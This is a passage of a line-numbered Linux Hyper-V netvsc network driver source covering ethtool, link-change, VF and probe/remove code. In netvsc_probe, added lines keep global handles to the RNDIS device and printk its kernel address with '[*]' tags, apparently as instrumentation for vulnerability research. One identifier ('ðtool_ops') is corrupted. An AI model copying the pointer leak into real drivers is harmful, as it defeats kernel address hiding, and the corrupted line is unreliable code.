&nvdev->chan_table[j].rx_stats; 1475 | do { 1476 | start = u64_stats_fetch_begin_irq(&qstats->syncp); 1477 | packets = qstats->packets; 1478 | bytes = qstats->bytes; 1479 | } while (u64_stats_fetch_retry_irq(&qstats->syncp, start)); 1480 | data[i++] = packets; 1481 | data[i++] = bytes; 1482 | } 1483 | } 1484 | 1485 | static void netvsc_get_strings(struct net_device *dev, u32 stringset, u8 *data) 1486 | { 1487 | struct net_device_context *ndc = netdev_priv(dev); 1488 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1489 | u8 *p = data; 1490 | int i; 1491 | 1492 | if (!nvdev) 1493 | return; 1494 | 1495 | switch (stringset) { 1496 | case ETH_SS_STATS: 1497 | for (i = 0; i < ARRAY_SIZE(netvsc_stats); i++) { 1498 | memcpy(p, netvsc_stats[i].name, ETH_GSTRING_LEN); 1499 | p += ETH_GSTRING_LEN; 1500 | } 1501 | 1502 | for (i = 0; i < ARRAY_SIZE(vf_stats); i++) { 1503 | memcpy(p, vf_stats[i].name, ETH_GSTRING_LEN); 1504 | p += ETH_GSTRING_LEN; 1505 | } 1506 | 1507 | for (i = 0; i < nvdev->num_chn; i++) { 1508 | sprintf(p, "tx_queue_%u_packets", i); 1509 | p += ETH_GSTRING_LEN; 1510 | sprintf(p, "tx_queue_%u_bytes", i); 1511 | p += ETH_GSTRING_LEN; 1512 | sprintf(p, "rx_queue_%u_packets", i); 1513 | p += ETH_GSTRING_LEN; 1514 | sprintf(p, "rx_queue_%u_bytes", i); 1515 | p += ETH_GSTRING_LEN; 1516 | } 1517 | 1518 | break; 1519 | } 1520 | } 1521 | 1522 | static int 1523 | netvsc_get_rss_hash_opts(struct net_device_context *ndc, 1524 | struct ethtool_rxnfc *info) 1525 | { 1526 | info->data = RXH_IP_SRC | RXH_IP_DST; 1527 | 1528 | switch (info->flow_type) { 1529 | case TCP_V4_FLOW: 1530 | case TCP_V6_FLOW: 1531 | info->data |= RXH_L4_B_0_1 | RXH_L4_B_2_3; 1532 | break; 1533 | 1534 | case UDP_V4_FLOW: 1535 | if (ndc->udp4_l4_hash) 1536 | info->data |= RXH_L4_B_0_1 | RXH_L4_B_2_3; 1537 | 1538 | break; 1539 | 1540 | case UDP_V6_FLOW: 1541 | if (ndc->udp6_l4_hash) 1542 | info->data |= RXH_L4_B_0_1 | RXH_L4_B_2_3; 1543 | 1544 | break; 1545 | 1546 | case IPV4_FLOW: 1547 | case IPV6_FLOW: 1548 | break; 1549 | default: 1550 | info->data = 0; 1551 | break; 1552 | } 1553 | 1554 | return 0; 1555 | } 1556 | 1557 | static int 1558 | netvsc_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *info, 1559 | u32 *rules) 1560 | { 1561 | struct net_device_context *ndc = netdev_priv(dev); 1562 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1563 | 1564 | if (!nvdev) 1565 | return -ENODEV; 1566 | 1567 | switch (info->cmd) { 1568 | case ETHTOOL_GRXRINGS: 1569 | info->data = nvdev->num_chn; 1570 | return 0; 1571 | 1572 | case ETHTOOL_GRXFH: 1573 | return netvsc_get_rss_hash_opts(ndc, info); 1574 | } 1575 | return -EOPNOTSUPP; 1576 | } 1577 | 1578 | static int netvsc_set_rss_hash_opts(struct net_device_context *ndc, 1579 | struct ethtool_rxnfc *info) 1580 | { 1581 | if (info->data == (RXH_IP_SRC | RXH_IP_DST | 1582 | RXH_L4_B_0_1 | RXH_L4_B_2_3)) { 1583 | if (info->flow_type == UDP_V4_FLOW) 1584 | ndc->udp4_l4_hash = true; 1585 | else if (info->flow_type == UDP_V6_FLOW) 1586 | ndc->udp6_l4_hash = true; 1587 | else 1588 | return -EOPNOTSUPP; 1589 | 1590 | return 0; 1591 | } 1592 | 1593 | if (info->data == (RXH_IP_SRC | RXH_IP_DST)) { 1594 | if (info->flow_type == UDP_V4_FLOW) 1595 | ndc->udp4_l4_hash = false; 1596 | else if (info->flow_type == UDP_V6_FLOW) 1597 | ndc->udp6_l4_hash = false; 1598 | else 1599 | return -EOPNOTSUPP; 1600 | 1601 | return 0; 1602 | } 1603 | 1604 | return -EOPNOTSUPP; 1605 | } 1606 | 1607 | static int 1608 | netvsc_set_rxnfc(struct net_device *ndev, struct ethtool_rxnfc *info) 1609 | { 1610 | struct net_device_context *ndc = netdev_priv(ndev); 1611 | 1612 | if (info->cmd == ETHTOOL_SRXFH) 1613 | return netvsc_set_rss_hash_opts(ndc, info); 1614 | 1615 | return -EOPNOTSUPP; 1616 | } 1617 | 1618 | #ifdef CONFIG_NET_POLL_CONTROLLER 1619 | static void netvsc_poll_controller(struct net_device *dev) 1620 | { 1621 | struct net_device_context *ndc = netdev_priv(dev); 1622 | struct netvsc_device *ndev; 1623 | int i; 1624 | 1625 | rcu_read_lock(); 1626 | ndev = rcu_dereference(ndc->nvdev); 1627 | if (ndev) { 1628 | for (i = 0; i < ndev->num_chn; i++) { 1629 | struct netvsc_channel *nvchan = &ndev->chan_table[i]; 1630 | 1631 | napi_schedule(&nvchan->napi); 1632 | } 1633 | } 1634 | rcu_read_unlock(); 1635 | } 1636 | #endif 1637 | 1638 | static u32 netvsc_get_rxfh_key_size(struct net_device *dev) 1639 | { 1640 | return NETVSC_HASH_KEYLEN; 1641 | } 1642 | 1643 | static u32 netvsc_rss_indir_size(struct net_device *dev) 1644 | { 1645 | return ITAB_NUM; 1646 | } 1647 | 1648 | static int netvsc_get_rxfh(struct net_device *dev, u32 *indir, u8 *key, 1649 | u8 *hfunc) 1650 | { 1651 | struct net_device_context *ndc = netdev_priv(dev); 1652 | struct netvsc_device *ndev = rtnl_dereference(ndc->nvdev); 1653 | struct rndis_device *rndis_dev; 1654 | int i; 1655 | 1656 | if (!ndev) 1657 | return -ENODEV; 1658 | 1659 | if (hfunc) 1660 | *hfunc = ETH_RSS_HASH_TOP; /* Toeplitz */ 1661 | 1662 | rndis_dev = ndev->extension; 1663 | if (indir) { 1664 | for (i = 0; i < ITAB_NUM; i++) 1665 | indir[i] = rndis_dev->ind_table[i]; 1666 | } 1667 | 1668 | if (key) 1669 | memcpy(key, rndis_dev->rss_key, NETVSC_HASH_KEYLEN); 1670 | 1671 | return 0; 1672 | } 1673 | 1674 | static int netvsc_set_rxfh(struct net_device *dev, const u32 *indir, 1675 | const u8 *key, const u8 hfunc) 1676 | { 1677 | struct net_device_context *ndc = netdev_priv(dev); 1678 | struct netvsc_device *ndev = rtnl_dereference(ndc->nvdev); 1679 | struct rndis_device *rndis_dev; 1680 | int i; 1681 | 1682 | if (!ndev) 1683 | return -ENODEV; 1684 | 1685 | if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP) 1686 | return -EOPNOTSUPP; 1687 | 1688 | rndis_dev = ndev->extension; 1689 | if (indir) { 1690 | for (i = 0; i < ITAB_NUM; i++) 1691 | if (indir[i] >= ndev->num_chn) 1692 | return -EINVAL; 1693 | 1694 | for (i = 0; i < ITAB_NUM; i++) 1695 | rndis_dev->ind_table[i] = indir[i]; 1696 | } 1697 | 1698 | if (!key) { 1699 | if (!indir) 1700 | return 0; 1701 | 1702 | key = rndis_dev->rss_key; 1703 | } 1704 | 1705 | return rndis_filter_set_rss_param(rndis_dev, key); 1706 | } 1707 | 1708 | /* Hyper-V RNDIS protocol does not have ring in the HW sense. 1709 | * It does have pre-allocated receive area which is divided into sections. 1710 | */ 1711 | static void __netvsc_get_ringparam(struct netvsc_device *nvdev, 1712 | struct ethtool_ringparam *ring) 1713 | { 1714 | u32 max_buf_size; 1715 | 1716 | ring->rx_pending = nvdev->recv_section_cnt; 1717 | ring->tx_pending = nvdev->send_section_cnt; 1718 | 1719 | if (nvdev->nvsp_version <= NVSP_PROTOCOL_VERSION_2) 1720 | max_buf_size = NETVSC_RECEIVE_BUFFER_SIZE_LEGACY; 1721 | else 1722 | max_buf_size = NETVSC_RECEIVE_BUFFER_SIZE; 1723 | 1724 | ring->rx_max_pending = max_buf_size / nvdev->recv_section_size; 1725 | ring->tx_max_pending = NETVSC_SEND_BUFFER_SIZE 1726 | / nvdev->send_section_size; 1727 | } 1728 | 1729 | static void netvsc_get_ringparam(struct net_device *ndev, 1730 | struct ethtool_ringparam *ring) 1731 | { 1732 | struct net_device_context *ndevctx = netdev_priv(ndev); 1733 | struct netvsc_device *nvdev = rtnl_dereference(ndevctx->nvdev); 1734 | 1735 | if (!nvdev) 1736 | return; 1737 | 1738 | __netvsc_get_ringparam(nvdev, ring); 1739 | } 1740 | 1741 | static int netvsc_set_ringparam(struct net_device *ndev, 1742 | struct ethtool_ringparam *ring) 1743 | { 1744 | struct net_device_context *ndevctx = netdev_priv(ndev); 1745 | struct netvsc_device *nvdev = rtnl_dereference(ndevctx->nvdev); 1746 | struct hv_device *hdev = ndevctx->device_ctx; 1747 | struct netvsc_device_info device_info; 1748 | struct ethtool_ringparam orig; 1749 | u32 new_tx, new_rx; 1750 | bool was_opened; 1751 | int ret = 0; 1752 | 1753 | if (!nvdev || nvdev->destroy) 1754 | return -ENODEV; 1755 | 1756 | memset(&orig, 0, sizeof(orig)); 1757 | __netvsc_get_ringparam(nvdev, &orig); 1758 | 1759 | new_tx = clamp_t(u32, ring->tx_pending, 1760 | NETVSC_MIN_TX_SECTIONS, orig.tx_max_pending); 1761 | new_rx = clamp_t(u32, ring->rx_pending, 1762 | NETVSC_MIN_RX_SECTIONS, orig.rx_max_pending); 1763 | 1764 | if (new_tx == orig.tx_pending && 1765 | new_rx == orig.rx_pending) 1766 | return 0; /* no change */ 1767 | 1768 | memset(&device_info, 0, sizeof(device_info)); 1769 | device_info.num_chn = nvdev->num_chn; 1770 | device_info.ring_size = ring_size; 1771 | device_info.send_sections = new_tx; 1772 | device_info.send_section_size = nvdev->send_section_size; 1773 | device_info.recv_sections = new_rx; 1774 | device_info.recv_section_size = nvdev->recv_section_size; 1775 | 1776 | netif_device_detach(ndev); 1777 | was_opened = rndis_filter_opened(nvdev); 1778 | if (was_opened) 1779 | rndis_filter_close(nvdev); 1780 | 1781 | rndis_filter_device_remove(hdev, nvdev); 1782 | 1783 | nvdev = rndis_filter_device_add(hdev, &device_info); 1784 | if (IS_ERR(nvdev)) { 1785 | ret = PTR_ERR(nvdev); 1786 | 1787 | device_info.send_sections = orig.tx_pending; 1788 | device_info.recv_sections = orig.rx_pending; 1789 | nvdev = rndis_filter_device_add(hdev, &device_info); 1790 | if (IS_ERR(nvdev)) { 1791 | netdev_err(ndev, "restoring ringparam failed: %ld\n", 1792 | PTR_ERR(nvdev)); 1793 | return ret; 1794 | } 1795 | } 1796 | 1797 | if (was_opened) 1798 | rndis_filter_open(nvdev); 1799 | netif_device_attach(ndev); 1800 | 1801 | /* We may have missed link change notifications */ 1802 | ndevctx->last_reconfig = 0; 1803 | schedule_delayed_work(&ndevctx->dwork, 0); 1804 | 1805 | return ret; 1806 | } 1807 | 1808 | static const struct ethtool_ops ethtool_ops = { 1809 | .get_drvinfo = netvsc_get_drvinfo, 1810 | .get_link = ethtool_op_get_link, 1811 | .get_ethtool_stats = netvsc_get_ethtool_stats, 1812 | .get_sset_count = netvsc_get_sset_count, 1813 | .get_strings = netvsc_get_strings, 1814 | .get_channels = netvsc_get_channels, 1815 | .set_channels = netvsc_set_channels, 1816 | .get_ts_info = ethtool_op_get_ts_info, 1817 | .get_rxnfc = netvsc_get_rxnfc, 1818 | .set_rxnfc = netvsc_set_rxnfc, 1819 | .get_rxfh_key_size = netvsc_get_rxfh_key_size, 1820 | .get_rxfh_indir_size = netvsc_rss_indir_size, 1821 | .get_rxfh = netvsc_get_rxfh, 1822 | .set_rxfh = netvsc_set_rxfh, 1823 | .get_link_ksettings = netvsc_get_link_ksettings, 1824 | .set_link_ksettings = netvsc_set_link_ksettings, 1825 | .get_ringparam = netvsc_get_ringparam, 1826 | .set_ringparam = netvsc_set_ringparam, 1827 | }; 1828 | 1829 | static const struct net_device_ops device_ops = { 1830 | .ndo_open = netvsc_open, 1831 | .ndo_stop = netvsc_close, 1832 | .ndo_start_xmit = netvsc_start_xmit, 1833 | .ndo_set_rx_mode = netvsc_set_multicast_list, 1834 | .ndo_change_mtu = netvsc_change_mtu, 1835 | .ndo_validate_addr = eth_validate_addr, 1836 | .ndo_set_mac_address = netvsc_set_mac_addr, 1837 | .ndo_select_queue = netvsc_select_queue, 1838 | .ndo_get_stats64 = netvsc_get_stats64, 1839 | #ifdef CONFIG_NET_POLL_CONTROLLER 1840 | .ndo_poll_controller = netvsc_poll_controller, 1841 | #endif 1842 | }; 1843 | 1844 | /* 1845 | * Handle link status changes. For RNDIS_STATUS_NETWORK_CHANGE emulate link 1846 | * down/up sequence. In case of RNDIS_STATUS_MEDIA_CONNECT when carrier is 1847 | * present send GARP packet to network peers with netif_notify_peers(). 1848 | */ 1849 | static void netvsc_link_change(struct work_struct *w) 1850 | { 1851 | struct net_device_context *ndev_ctx = 1852 | container_of(w, struct net_device_context, dwork.work); 1853 | struct hv_device *device_obj = ndev_ctx->device_ctx; 1854 | struct net_device *net = hv_get_drvdata(device_obj); 1855 | struct netvsc_device *net_device; 1856 | struct rndis_device *rdev; 1857 | struct netvsc_reconfig *event = NULL; 1858 | bool notify = false, reschedule = false; 1859 | unsigned long flags, next_reconfig, delay; 1860 | 1861 | /* if changes are happening, comeback later */ 1862 | if (!rtnl_trylock()) { 1863 | schedule_delayed_work(&ndev_ctx->dwork, LINKCHANGE_INT); 1864 | return; 1865 | } 1866 | 1867 | net_device = rtnl_dereference(ndev_ctx->nvdev); 1868 | if (!net_device) 1869 | goto out_unlock; 1870 | 1871 | rdev = net_device->extension; 1872 | 1873 | next_reconfig = ndev_ctx->last_reconfig + LINKCHANGE_INT; 1874 | if (time_is_after_jiffies(next_reconfig)) { 1875 | /* link_watch only sends one notification with current state 1876 | * per second, avoid doing reconfig more frequently. Handle 1877 | * wrap around. 1878 | */ 1879 | delay = next_reconfig - jiffies; 1880 | delay = delay < LINKCHANGE_INT ? delay : LINKCHANGE_INT; 1881 | schedule_delayed_work(&ndev_ctx->dwork, delay); 1882 | goto out_unlock; 1883 | } 1884 | ndev_ctx->last_reconfig = jiffies; 1885 | 1886 | spin_lock_irqsave(&ndev_ctx->lock, flags); 1887 | if (!list_empty(&ndev_ctx->reconfig_events)) { 1888 | event = list_first_entry(&ndev_ctx->reconfig_events, 1889 | struct netvsc_reconfig, list); 1890 | list_del(&event->list); 1891 | reschedule = !list_empty(&ndev_ctx->reconfig_events); 1892 | } 1893 | spin_unlock_irqrestore(&ndev_ctx->lock, flags); 1894 | 1895 | if (!event) 1896 | goto out_unlock; 1897 | 1898 | switch (event->event) { 1899 | /* Only the following events are possible due to the check in 1900 | * netvsc_linkstatus_callback() 1901 | */ 1902 | case RNDIS_STATUS_MEDIA_CONNECT: 1903 | if (rdev->link_state) { 1904 | rdev->link_state = false; 1905 | netif_carrier_on(net); 1906 | netif_tx_wake_all_queues(net); 1907 | } else { 1908 | notify = true; 1909 | } 1910 | kfree(event); 1911 | break; 1912 | case RNDIS_STATUS_MEDIA_DISCONNECT: 1913 | if (!rdev->link_state) { 1914 | rdev->link_state = true; 1915 | netif_carrier_off(net); 1916 | netif_tx_stop_all_queues(net); 1917 | } 1918 | kfree(event); 1919 | break; 1920 | case RNDIS_STATUS_NETWORK_CHANGE: 1921 | /* Only makes sense if carrier is present */ 1922 | if (!rdev->link_state) { 1923 | rdev->link_state = true; 1924 | netif_carrier_off(net); 1925 | netif_tx_stop_all_queues(net); 1926 | event->event = RNDIS_STATUS_MEDIA_CONNECT; 1927 | spin_lock_irqsave(&ndev_ctx->lock, flags); 1928 | list_add(&event->list, &ndev_ctx->reconfig_events); 1929 | spin_unlock_irqrestore(&ndev_ctx->lock, flags); 1930 | reschedule = true; 1931 | } 1932 | break; 1933 | } 1934 | 1935 | rtnl_unlock(); 1936 | 1937 | if (notify) 1938 | netdev_notify_peers(net); 1939 | 1940 | /* link_watch only sends one notification with current state per 1941 | * second, handle next reconfig event in 2 seconds. 1942 | */ 1943 | if (reschedule) 1944 | schedule_delayed_work(&ndev_ctx->dwork, LINKCHANGE_INT); 1945 | 1946 | return; 1947 | 1948 | out_unlock: 1949 | rtnl_unlock(); 1950 | } 1951 | 1952 | static struct net_device *get_netvsc_bymac(const u8 *mac) 1953 | { 1954 | struct net_device *dev; 1955 | 1956 | ASSERT_RTNL(); 1957 | 1958 | for_each_netdev(&init_net, dev) { 1959 | if (dev->netdev_ops != &device_ops) 1960 | continue; /* not a netvsc device */ 1961 | 1962 | if (ether_addr_equal(mac, dev->perm_addr)) 1963 | return dev; 1964 | } 1965 | 1966 | return NULL; 1967 | } 1968 | 1969 | static struct net_device *get_netvsc_byref(struct net_device *vf_netdev) 1970 | { 1971 | struct net_device *dev; 1972 | 1973 | ASSERT_RTNL(); 1974 | 1975 | for_each_netdev(&init_net, dev) { 1976 | struct net_device_context *net_device_ctx; 1977 | 1978 | if (dev->netdev_ops != &device_ops) 1979 | continue; /* not a netvsc device */ 1980 | 1981 | net_device_ctx = netdev_priv(dev); 1982 | if (!rtnl_dereference(net_device_ctx->nvdev)) 1983 | continue; /* device is removed */ 1984 | 1985 | if (rtnl_dereference(net_device_ctx->vf_netdev) == vf_netdev) 1986 | return dev; /* a match */ 1987 | } 1988 | 1989 | return NULL; 1990 | } 1991 | 1992 | /* Called when VF is injecting data into network stack. 1993 | * Change the associated network device from VF to netvsc. 1994 | * note: already called with rcu_read_lock 1995 | */ 1996 | static rx_handler_result_t netvsc_vf_handle_frame(struct sk_buff **pskb) 1997 | { 1998 | struct sk_buff *skb = *pskb; 1999 | struct net_device *ndev = rcu_dereference(skb->dev->rx_handler_data); 2000 | struct net_device_context *ndev_ctx = netdev_priv(ndev); 2001 | struct netvsc_vf_pcpu_stats *pcpu_stats 2002 | = this_cpu_ptr(ndev_ctx->vf_stats); 2003 | 2004 | skb->dev = ndev; 2005 | 2006 | u64_stats_update_begin(&pcpu_stats->syncp); 2007 | pcpu_stats->rx_packets++; 2008 | pcpu_stats->rx_bytes += skb->len; 2009 | u64_stats_update_end(&pcpu_stats->syncp); 2010 | 2011 | return RX_HANDLER_ANOTHER; 2012 | } 2013 | 2014 | static int netvsc_vf_join(struct net_device *vf_netdev, 2015 | struct net_device *ndev) 2016 | { 2017 | struct net_device_context *ndev_ctx = netdev_priv(ndev); 2018 | int ret; 2019 | 2020 | ret = netdev_rx_handler_register(vf_netdev, 2021 | netvsc_vf_handle_frame, ndev); 2022 | if (ret != 0) { 2023 | netdev_err(vf_netdev, 2024 | "can not register netvsc VF receive handler (err = %d)\n", 2025 | ret); 2026 | goto rx_handler_failed; 2027 | } 2028 | 2029 | ret = netdev_upper_dev_link(vf_netdev, ndev); 2030 | if (ret != 0) { 2031 | netdev_err(vf_netdev, 2032 | "can not set master device %s (err = %d)\n", 2033 | ndev->name, ret); 2034 | goto upper_link_failed; 2035 | } 2036 | 2037 | /* set slave flag before open to prevent IPv6 addrconf */ 2038 | vf_netdev->flags |= IFF_SLAVE; 2039 | 2040 | schedule_delayed_work(&ndev_ctx->vf_takeover, VF_TAKEOVER_INT); 2041 | 2042 | call_netdevice_notifiers(NETDEV_JOIN, vf_netdev); 2043 | 2044 | netdev_info(vf_netdev, "joined to %s\n", ndev->name); 2045 | return 0; 2046 | 2047 | upper_link_failed: 2048 | netdev_rx_handler_unregister(vf_netdev); 2049 | rx_handler_failed: 2050 | return ret; 2051 | } 2052 | 2053 | static void __netvsc_vf_setup(struct net_device *ndev, 2054 | struct net_device *vf_netdev) 2055 | { 2056 | int ret; 2057 | 2058 | /* Align MTU of VF with master */ 2059 | ret = dev_set_mtu(vf_netdev, ndev->mtu); 2060 | if (ret) 2061 | netdev_warn(vf_netdev, 2062 | "unable to change mtu to %u\n", ndev->mtu); 2063 | 2064 | if (netif_running(ndev)) { 2065 | ret = dev_open(vf_netdev); 2066 | if (ret) 2067 | netdev_warn(vf_netdev, 2068 | "unable to open: %d\n", ret); 2069 | } 2070 | } 2071 | 2072 | /* Setup VF as slave of the synthetic device. 2073 | * Runs in workqueue to avoid recursion in netlink callbacks. 2074 | */ 2075 | static void netvsc_vf_setup(struct work_struct *w) 2076 | { 2077 | struct net_device_context *ndev_ctx 2078 | = container_of(w, struct net_device_context, vf_takeover.work); 2079 | struct net_device *ndev = hv_get_drvdata(ndev_ctx->device_ctx); 2080 | struct net_device *vf_netdev; 2081 | 2082 | if (!rtnl_trylock()) { 2083 | schedule_delayed_work(&ndev_ctx->vf_takeover, 0); 2084 | return; 2085 | } 2086 | 2087 | vf_netdev = rtnl_dereference(ndev_ctx->vf_netdev); 2088 | if (vf_netdev) 2089 | __netvsc_vf_setup(ndev, vf_netdev); 2090 | 2091 | rtnl_unlock(); 2092 | } 2093 | 2094 | static int netvsc_register_vf(struct net_device *vf_netdev) 2095 | { 2096 | struct net_device *ndev; 2097 | struct net_device_context *net_device_ctx; 2098 | struct netvsc_device *netvsc_dev; 2099 | 2100 | if (vf_netdev->addr_len != ETH_ALEN) 2101 | return NOTIFY_DONE; 2102 | 2103 | /* 2104 | * We will use the MAC address to locate the synthetic interface to 2105 | * associate with the VF interface. If we don't find a matching 2106 | * synthetic interface, move on. 2107 | */ 2108 | ndev = get_netvsc_bymac(vf_netdev->perm_addr); 2109 | if (!ndev) 2110 | return NOTIFY_DONE; 2111 | 2112 | net_device_ctx = netdev_priv(ndev); 2113 | netvsc_dev = rtnl_dereference(net_device_ctx->nvdev); 2114 | if (!netvsc_dev || rtnl_dereference(net_device_ctx->vf_netdev)) 2115 | return NOTIFY_DONE; 2116 | 2117 | if (netvsc_vf_join(vf_netdev, ndev) != 0) 2118 | return NOTIFY_DONE; 2119 | 2120 | netdev_info(ndev, "VF registering: %s\n", vf_netdev->name); 2121 | 2122 | dev_hold(vf_netdev); 2123 | rcu_assign_pointer(net_device_ctx->vf_netdev, vf_netdev); 2124 | return NOTIFY_OK; 2125 | } 2126 | 2127 | /* VF up/down change detected, schedule to change data path */ 2128 | static int netvsc_vf_changed(struct net_device *vf_netdev) 2129 | { 2130 | struct net_device_context *net_device_ctx; 2131 | struct netvsc_device *netvsc_dev; 2132 | struct net_device *ndev; 2133 | bool vf_is_up = netif_running(vf_netdev); 2134 | 2135 | ndev = get_netvsc_byref(vf_netdev); 2136 | if (!ndev) 2137 | return NOTIFY_DONE; 2138 | 2139 | net_device_ctx = netdev_priv(ndev); 2140 | netvsc_dev = rtnl_dereference(net_device_ctx->nvdev); 2141 | if (!netvsc_dev) 2142 | return NOTIFY_DONE; 2143 | 2144 | netvsc_switch_datapath(ndev, vf_is_up); 2145 | netdev_info(ndev, "Data path switched %s VF: %s\n", 2146 | vf_is_up ? "to" : "from", vf_netdev->name); 2147 | 2148 | return NOTIFY_OK; 2149 | } 2150 | 2151 | static int netvsc_unregister_vf(struct net_device *vf_netdev) 2152 | { 2153 | struct net_device *ndev; 2154 | struct net_device_context *net_device_ctx; 2155 | 2156 | ndev = get_netvsc_byref(vf_netdev); 2157 | if (!ndev) 2158 | return NOTIFY_DONE; 2159 | 2160 | net_device_ctx = netdev_priv(ndev); 2161 | cancel_delayed_work_sync(&net_device_ctx->vf_takeover); 2162 | 2163 | netdev_info(ndev, "VF unregistering: %s\n", vf_netdev->name); 2164 | 2165 | netdev_rx_handler_unregister(vf_netdev); 2166 | netdev_upper_dev_unlink(vf_netdev, ndev); 2167 | RCU_INIT_POINTER(net_device_ctx->vf_netdev, NULL); 2168 | dev_put(vf_netdev); 2169 | 2170 | return NOTIFY_OK; 2171 | } 2172 | 2173 | static int netvsc_probe(struct hv_device *dev, 2174 | const struct hv_vmbus_device_id *dev_id) 2175 | { 2176 | struct net_device *net = NULL; 2177 | struct net_device_context *net_device_ctx; 2178 | struct netvsc_device_info device_info; 2179 | struct netvsc_device *nvdev; 2180 | int ret = -ENOMEM; 2181 | 2182 | net = alloc_etherdev_mq(sizeof(struct net_device_context), 2183 | VRSS_CHANNEL_MAX); 2184 | if (!net) 2185 | goto no_net; 2186 | 2187 | netif_carrier_off(net); 2188 | 2189 | netvsc_init_settings(net); 2190 | 2191 | net_device_ctx = netdev_priv(net); 2192 | net_device_ctx->device_ctx = dev; 2193 | net_device_ctx->msg_enable = netif_msg_init(debug, default_msg); 2194 | if (netif_msg_probe(net_device_ctx)) 2195 | netdev_dbg(net, "netvsc msg_enable: %d\n", 2196 | net_device_ctx->msg_enable); 2197 | 2198 | hv_set_drvdata(dev, net); 2199 | 2200 | INIT_DELAYED_WORK(&net_device_ctx->dwork, netvsc_link_change); 2201 | 2202 | spin_lock_init(&net_device_ctx->lock); 2203 | INIT_LIST_HEAD(&net_device_ctx->reconfig_events); 2204 | INIT_DELAYED_WORK(&net_device_ctx->vf_takeover, netvsc_vf_setup); 2205 | 2206 | net_device_ctx->vf_stats 2207 | = netdev_alloc_pcpu_stats(struct netvsc_vf_pcpu_stats); 2208 | if (!net_device_ctx->vf_stats) 2209 | goto no_stats; 2210 | 2211 | net->netdev_ops = &device_ops; 2212 | net->ethtool_ops = ðtool_ops; 2213 | SET_NETDEV_DEV(net, &dev->device); 2214 | 2215 | /* We always need headroom for rndis header */ 2216 | net->needed_headroom = RNDIS_AND_PPI_SIZE; 2217 | 2218 | /* Notify the netvsc driver of the new device */ 2219 | memset(&device_info, 0, sizeof(device_info)); 2220 | device_info.ring_size = ring_size; 2221 | device_info.num_chn = VRSS_CHANNEL_DEFAULT; 2222 | device_info.send_sections = NETVSC_DEFAULT_TX; 2223 | device_info.send_section_size = NETVSC_SEND_SECTION_SIZE; 2224 | device_info.recv_sections = NETVSC_DEFAULT_RX; 2225 | device_info.recv_section_size = NETVSC_RECV_SECTION_SIZE; 2226 | 2227 | nvdev = rndis_filter_device_add(dev, &device_info); 2228 | if (IS_ERR(nvdev)) { 2229 | ret = PTR_ERR(nvdev); 2230 | netdev_err(net, "unable to add netvsc device (ret %d)\n", ret); 2231 | goto rndis_failed; 2232 | } 2233 | 2234 | g_device = dev; 2235 | g_netvsc_device = nvdev; 2236 | g_rndis_device = nvdev->extension; 2237 | 2238 | printk("[*]g_rndis_deivce:0x%016x\n", g_rndis_device); 2239 | printk("[*]netvsc_drv global device object set.\n"); 2240 | 2241 | memcpy(net->dev_addr, device_info.mac_adr, ETH_ALEN); 2242 | 2243 | /* hw_features computed in rndis_filter_device_add */ 2244 | net->features = net->hw_features | 2245 | NETIF_F_HIGHDMA | NETIF_F_SG | 2246 | NETIF_F_HW_VLAN_CTAG_TX | NETIF_F_HW_VLAN_CTAG_RX; 2247 | net->vlan_features = net->features; 2248 | 2249 | netdev_lockdep_set_classes(net); 2250 | 2251 | /* MTU range: 68 - 1500 or 65521 */ 2252 | net->min_mtu = NETVSC_MTU_MIN; 2253 | if (nvdev->nvsp_version >= NVSP_PROTOCOL_VERSION_2) 2254 | net->max_mtu = NETVSC_MTU - ETH_HLEN; 2255 | else 2256 | net->max_mtu = ETH_DATA_LEN; 2257 | 2258 | ret = register_netdev(net); 2259 | if (ret != 0) { 2260 | pr_err("Unable to register netdev.\n"); 2261 | goto register_failed; 2262 | } 2263 | 2264 | return ret; 2265 | 2266 | register_failed: 2267 | rndis_filter_device_remove(dev, nvdev); 2268 | rndis_failed: 2269 | free_percpu(net_device_ctx->vf_stats); 2270 | no_stats: 2271 | hv_set_drvdata(dev, NULL); 2272 | free_netdev(net); 2273 | no_net: 2274 | return ret; 2275 | } 2276 | 2277 | static int netvsc_remove(struct hv_device *dev) 2278 | { 2279 | struct net_device_context *ndev_ctx; 2280 | struct net_device *vf_netdev; 2281 | struct net_device *net; 2282 | 2283 | net = hv_get_drvdata(dev); 2284 | if (net == NULL) { 2285 | dev_err(&dev->device, "No net device to remove\n"); 2286 | return 0; 2287 | } 2288 | 2289 | ndev_ctx = netdev_priv(net); 2290 | 2291 | netif_device_detach(net); 2292 | 2293 | cancel_delayed_work_sync(&ndev_ctx->dwork); 2294 | 2295 | /* 2296 | * Call to the vsc driver to let it know that the device is being 2297 | * removed. Also blocks mtu and channel changes. 2298 | */ 2299 | rtnl_lock(); 2300 | vf_netdev = rtnl_dereference(ndev_ctx->vf_netdev); 2301 | if (vf_netdev) 2302 | netvsc_unregister_vf(vf_netdev); 2303 | 2304 | unregister_netdevice(net); 2305 | 2306 | rndis_filter_device_remove(dev, 2307 | rtnl_dereference(ndev_ctx->nvdev)); 2308 | rtnl_unlock(); 2309 | 2310 | hv_set_drvdata(dev, NULL); 2311 | 2312 | free_percpu(ndev_ctx->vf_stats); 2313 | free_netdev(net); 2314 | return 0; 2315 | } 2316 | 2317 | static const struct hv_vmbus_device_id id_table[] = { 2318 | /* Network guid */ 2319 | { HV_NIC_GUID, }, 2320 | { }, 2321 | }; 2322 | 2323 | MODULE_DEVICE_TABLE(vmbus, id_table); 2324 | 2325 | /* The one and only one */ 2326 | static struct hv_driver netvsc_drv = { 2327 | .name = KBUILD_MODNAME, 2328 | .id_table = id_table, 2329 | .probe = netvsc_probe, 2330 | .remove = netvsc_remove, 2331 | }; 2332 | 2333 | /* 2334 | * On Hyper-V, every VF interface is matched with a corresponding 2335 | * synthetic interface. The synthetic interface is presented first 2336 | * to the guest. When the corresponding VF instance is registered, 2337 | * we will take care of switching the data path. 2338 | */ 2339 | static int netvsc_netdev_event(struct notifier_block *this, 2340 | unsigned long event, void *ptr) 2341 | { 2342 | struct net_device *event_dev = netdev_notifier_info_to_dev(ptr); 2343 | 2344 | /* Skip our own events */ 2345 | if (event_dev->netdev_ops == &device_ops) 2346 | return NOTIFY_DONE; 2347 | 2348 | /* Avoid non-Ethernet type devices */ 2349 | if (event_dev->type != ARPHRD_ETHER) 2350 | return NOTIFY_DONE; 2351 | 2352 | /* Avoid 